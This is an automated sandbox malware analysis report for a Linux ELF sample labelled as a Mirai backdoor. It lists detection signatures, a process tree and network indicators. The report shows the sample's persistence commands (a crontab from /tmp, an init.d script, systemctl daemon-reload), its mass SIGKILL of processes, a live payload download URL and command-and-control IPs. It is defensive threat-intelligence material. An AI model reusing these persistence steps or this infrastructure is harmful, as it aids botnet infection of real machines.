Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g6.elf

Overview

General Information

Sample name:g6.elf
Analysis ID:1589612
MD5:8718f3367ac74935cd1fa1f542917234
SHA1:8983d66200c8167fc859852226a45356b38d3624
SHA256:d80c634884bbde73b5dd48cee37a5e1bc11055bb15e320c2b41b2c2a76d6e34a
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589612
Start date and time:2025-01-12 23:42:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g6.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g6
Command:/tmp/g6.elf
PID:6237
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g6.elf (PID: 6237, Parent: 6160, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g6.elf
    • g6.elf New Fork (PID: 6248, Parent: 6237)
    • sh (PID: 6248, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6250, Parent: 6248)
      • systemctl (PID: 6250, Parent: 6248, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g6.elf New Fork (PID: 6264, Parent: 6237)
    • sh (PID: 6264, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 6268, Parent: 6264)
      • crontab (PID: 6268, Parent: 6264, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g6.elf New Fork (PID: 6269, Parent: 6237)
    • sh (PID: 6269, Parent: 6237, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 6271, Parent: 6269)
    • g6.elf New Fork (PID: 6273, Parent: 6237)
      • g6.elf New Fork (PID: 6275, Parent: 6273)
        • g6.elf New Fork (PID: 6281, Parent: 6275)
        • g6.elf New Fork (PID: 6283, Parent: 6275)
        • g6.elf New Fork (PID: 6286, Parent: 6275)
  • wrapper-2.0 (PID: 6239, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6240, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6241, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6242, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6243, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6244, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6252, Parent: 6251)
  • snapd-env-generator (PID: 6252, Parent: 6251, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g6.elfVirustotal: Detection: 25%Perma Link
Source: g6.elfReversingLabs: Detection: 31%
Source: global trafficTCP traffic: 192.168.2.23:48828 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.23:46223 -> 1.1.1.1:53
Source: /tmp/g6.elf (PID: 6237)Socket: 127.0.0.1:23476Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g6.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, tmp.PCAPJa.36.dr, hello.12.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/g6
Source: g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6239, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6240, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6241, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6242, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6243, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6244, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6239, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6240, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6241, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6242, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6243, result: successfulJump to behavior
Source: /tmp/g6.elf (PID: 6237)SIGKILL sent: pid: 6244, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6268)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 6268)File: /var/spool/cron/crontabs/tmp.PCAPJaJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6070/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6070/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6070/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6070/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6247/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6247/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6247/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/6247/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2285/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6286)File opened: /proc/2281/cmdlineJump to behavior
Source: /tmp/g6.elf (PID: 6248)Shell command executed: /bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g6.elf (PID: 6264)Shell command executed: /bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g6.elf (PID: 6269)Shell command executed: /bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 6250)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /tmp/g6.elf (PID: 6237)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g6.elf (PID: 6237)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g6.elf (PID: 6237)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g6.elf (PID: 6237)Queries kernel information via 'uname': Jump to behavior
Source: g6.elf, 6237.1.0000557de630f000.0000557de6461000.rw-.sdmp, g6.elf, 6273.1.0000557de630f000.0000557de6461000.rw-.sdmpBinary or memory string: }U!/etc/qemu-binfmt/arm
Source: g6.elf, 6237.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmp, g6.elf, 6273.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmpBinary or memory string: 5Ix86_64/usr/bin/qemu-arm/tmp/g6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g6.elf
Source: g6.elf, 6237.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmpBinary or memory string: /tmp/qemu-open.06otPQ
Source: g6.elf, 6237.1.0000557de630f000.0000557de6461000.rw-.sdmp, g6.elf, 6273.1.0000557de630f000.0000557de6461000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g6.elf, 6237.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmp, g6.elf, 6273.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g6.elf, 6237.1.00007ffc88b5c000.00007ffc88b7d000.rw-.sdmpBinary or memory string: }U/tmp/qemu-open.06otPQ:
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589612 Sample: g6.elf Startdate: 12/01/2025 Architecture: LINUX Score: 64 49 109.202.202.202, 80 INIT7CH Switzerland 2->49 51 1.1.1.1, 46223, 53 CLOUDFLARENETUS Australia 2->51 53 3 other IPs or domains 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 g6.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 43 /tmp/crontab.tmp, troff 9->43 dropped 45 /etc/init.d/hello, Bourne-Again 9->45 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g6.elf sh 9->19         started        21 g6.elf sh 9->21         started        23 g6.elf 9->23         started        25 g6.elf sh 9->25         started        signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 g6.elf 23->33         started        35 sh 25->35         started        file9 47 /var/spool/cron/crontabs/tmp.PCAPJa, troff 27->47 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 37 g6.elf 33->37         started        39 g6.elf 33->39         started        41 g6.elf 33->41         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g6.elf26%VirustotalBrowse
g6.elf32%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g6100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg6.elffalse
    high
    http://1/wget.shg6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpfalse
        high
        http://9/curl.shg6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpfalse
          high
          http://103.136.41.100/g6hello.service.12.dr, tmp.PCAPJa.36.dr, hello.12.dr, crontab.tmp.12.drfalse
          • Avira URL Cloud: malware
          unknown
          http://schemas.xmlsoap.org/soap/envelope/g6.elf, 6237.1.00007f76f4036000.00007f76f403d000.rw-.sdmp, g6.elf, 6273.1.00007f76f4036000.00007f76f403d000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g3.elfGet hashmaliciousUnknownBrowse
              m1.elfGet hashmaliciousUnknownBrowse
                m5.elfGet hashmaliciousUnknownBrowse
                  m2.elfGet hashmaliciousUnknownBrowse
                    1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                    • 1.1.1.1:8080/
                    6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                    • 1.1.1.1/ctrl/playback.php
                    PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                    • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                    AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                    • 1.1.1.1/
                    INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                    • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                    Go.exeGet hashmaliciousUnknownBrowse
                    • 1.1.1.1/
                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSg3.elfGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
